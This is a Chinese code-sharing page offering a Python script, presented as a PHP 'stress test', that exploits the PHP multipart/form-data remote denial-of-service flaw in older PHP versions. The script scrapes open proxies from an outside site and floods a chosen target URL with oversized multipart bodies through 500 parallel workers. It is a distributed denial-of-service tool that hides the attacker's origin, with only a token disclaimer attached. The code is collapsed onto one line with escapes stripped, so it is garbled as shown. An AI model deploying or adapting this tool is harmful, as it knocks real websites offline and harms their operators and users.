PHP压力测试脚本,10M/S带宽秒杀集群Google 现查的,利用 PHP Multipart / form-data远程dos漏洞。
适用 PHP 版本
PHP 5.6.9 以下版本
PHP 5.5.25 以下版本
PHP 5.4.41 以下版本
PHP 5.3 及所有以前的版本
使用方法
将以下内容保存成 .py 文件,执行 python xxx.py -t "http://PHP页面网址" 请勿输入其他人的网站。
注意:此工具造成的任何后果由使用者自行承担
去掉此段注释以运行脚本,Remove this comment to run script
import sys import urllib,urllib2 import datetime import re import os import threading import time import random from optparse import OptionParser from multiprocessing import Pool def check_php_multipartform_dos(url,post_body,headers,ip): proxy_handler = urllib2.ProxyHandler({"http" : ip}) null_proxy_handler = urllib2.ProxyHandler({}) opener = urllib2.build_opener(proxy_handler) urllib2.install_opener(opener) req = urllib2.Request(url) for key in headers.keys(): req.add_header(key,headers[key]) starttime = datetime.datetime.now(); fd = urllib2.urlopen(req,post_body) html = fd.read() endtime = datetime.datetime.now() usetime=(endtime - starttime).seconds if(usetime > 5): result = url+" is vulnerable"; else: if(usetime > 3): result = "need to check normal respond time" return [result,usetime] #end def get_stock_html(URL): opener = urllib2.build_opener( urllib2.HTTPRedirectHandler(), urllib2.HTTPHandler(debuglevel=0), ) opener.addheaders = [ ('User-agent', 'Mozilla/4.0 (compatible;MSIE 7.0;' 'Windows NT 5.1; .NET CLR 2.0.50727;' '.NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)') ] url = "http://proxy.com.ru/%s"%URL response = opener.open(url) return ''.join(response.readlines()) def Getting_Url(): global CC_Url file = open('url','r') CC_Url = file.readlines() file.close() def Getting_list(): global IP_Port IP_Port = [] for html_list in re.findall('list_d+.html',get_stock_html("list_1.html")): print "getting %s's IP:PORT"%html_list IP_Port += eval(re.sub('</td><td>',':',"%s"%re.findall('d+.d+.d+.d+</td><td>d+',get_stock_html(html_list)))) def main(): parser = OptionParser() parser.add_option("-t", "--target", action="store", dest="target", default=False, type="string", help="test target") (options, args) = parser.parse_args() target = options.target Num=350000 headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1', 'Accept-Encoding':'gzip, deflate', 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'} body = "------WebKitFormBoundaryX3B7rDMPcQlzmJE1nContent-Disposition: form-data; name="file"; filename=sp.jpg" payload="" for i in range(0,Num): payload = payload + "an" body = body + payload; body = body + "Content-Type: application/octet-streamrnrndatadatarn------WebKitFormBoundaryX3B7rDMPcQlzmJE1--" print "starting..."; Getting_list() pool = Pool(500) for ip in IP_Port: pool.apply_async(check_php_multipartform_dos, [target,body,headers,ip]) pool.close() pool.join() if __name__=="__main__": main()
常见问题FAQ
- 【点击查看】免费下载或者VIP会员专享资源能否直接商用?
- 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
- 【点击查看】提示下载完但解压或打开不了?
- 【点击查看】开通终身至尊下载源码 “不完整” 或 “不能用” 怎么办?
- 【点击查看】开通终身会员能下载全站资源码?
![红色响应式食品网站织梦dede模板源码[自适应手机版]](https://www.cnzhan.cn/wp-content/themes/ripro/timthumb.php?src=https://cdn.cnzhan.cn/wp-content/uploads/2020/11/1606104101-f83f30173a5bada.jpg&h=171&w=256&zc=1&a=c&q=100&s=1)
![[整站源码]苹果cms仿4567tv灰红色电影网站模板](https://www.cnzhan.cn/wp-content/themes/ripro/timthumb.php?src=https://cdn.cnzhan.cn/wp-content/uploads/2021/01/1611396490-4a0b28f9717b2af.jpg&h=171&w=256&zc=1&a=c&q=100&s=1)
